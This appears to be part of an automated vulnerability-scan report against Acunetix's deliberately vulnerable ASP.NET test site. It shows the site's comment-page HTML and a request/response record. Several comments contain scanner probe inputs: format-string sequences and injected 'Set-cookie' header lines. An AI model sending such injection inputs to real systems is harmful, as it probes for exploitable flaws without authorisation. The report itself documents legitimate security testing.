class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:09 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:10 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:10 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP %1!s%2!s%3!s%4!s%5!s%6!s%7!s%8!s%9!s%10!s%11!s%12!s%13!s%14!s%15!s%16!s%17!s%18!s%19!s%20!s%21!n%22!n%23!n%24!n%25!n%26!n%27!n%28!n%29!n%30!n%31!n%32!n%33!n%34!n%35!n%36!n%37!n%38!n%39!n%40!n </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:34 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:06 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">\|</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:22 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Show / hide Request and Response
Request Header - size: 452 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:21 GMT Content-Length: 55888
Response Body - size: 55,888 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 